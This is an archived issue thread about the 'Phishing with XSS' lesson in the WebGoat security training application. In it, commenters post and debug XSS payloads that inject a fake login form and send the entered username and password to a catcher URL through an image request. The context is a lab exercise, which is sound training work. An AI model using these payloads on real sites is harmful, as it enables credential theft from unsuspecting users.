Closed GoogleCodeExporter closed 8 years ago
Here are a few of the things I tried for Phishing w/ XSS. Neither of the first
two
would work when pasted in the box, but they triggered the check-off when in an
html
page by themselves and the login information was submitted.
* foo<script>function muahahaha(){ alert("User Name = " +
document.forms[0].user.value + "; Password = " + document.forms[0].pass.value);
XSSImage=new Image();
XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user=" +
document.forms[0].user.value + "&password=" +
document.forms[0].pass.value;}</script><form><br><br>login:<br><br>Enter
Username:<br><input type="text" name="user" name="user"><br>Enter
Password:<br><input
type="password" name = "pass"><br><input type="submit" name="login"
value="login"
onclick="muahahaha()"></form>
* bar<form><br><br>login:<br><br>Enter Username:<br><input type="text"
name="user" name="user"><br>Enter Password:<br><input type="password" name =
"pass"><br><input type="submit" name="login" value="login" onclick="var
XSSImage=new
Image(); XSSImage.src='http://localhost/webgoat/catcher?PROPERTY=yes&user=' +
this.form.user.value + '&password=' + this.form.pass.value;"></form>
* Substituting the variables with their values in the URL
(http://localhost/webgoat/catcher?PROPERTY=yes&user=guest&password=guest) and
pasting
that in the box works fine, though that doesn't illustrate the vulnerability.
I tried this on Firefox on Ubuntu. I isolated the problem to the inability to
access
"document.forms[0].user.value" in the lesson page, but it is unclear to me why
the
standalone works. Let me know if you figure this out.
Original comment by Lysand...@gmail.com
on 21 Mar 2010 at 7:21
Original comment by mayhe...@gmail.com
on 24 Mar 2010 at 8:34
I could fix this by giving my form inputs an Id an accessing them via
document.getElementById('username') etc.
Original comment by linux.ni...@gmail.com
on 9 Jun 2010 at 7:18
I face the same issue. Phishing with XSS doesn't work. I am using windows 7. If
I click Hint, Show Params and Show cookies all three then it creates an
additional login form above and that works. Which seems odd. Please fix this.
Original comment by nishikum...@gmail.com
on 25 Apr 2011 at 1:22
The problem is with the "document.forms[0].user.value" problem as was mentioned
above. There is another form before the one that needs to be changed, so
"forms[0]" targets the wrong one.
Using "document.form.user.value" (the form we want is named "form") works. You
should also be able to use "document.forms[1].user.value". I've already fixed
this in the hints and solutions, I just haven't pushed the update yet. I'll
switch this to "fixed" once I commit the updates.
Original comment by X71...@gmail.com
on 4 Aug 2011 at 2:42
Original comment by mayhe...@gmail.com
on 24 Apr 2012 at 11:08
I solved this inserting my port number 8080 after localhost, like this:
XSSImage.src="http://127.0.0.1:8080/WebGoat/catcher?PROPERTY=yes&user="+
document.phish.user.value + "&password=" + document.phish.pass.value + "";
Original comment by Mint...@gmail.com
on 5 Jul 2013 at 11:57
Original issue reported on code.google.com by
ol.batard@gmail.com
on 16 Feb 2010 at 6:48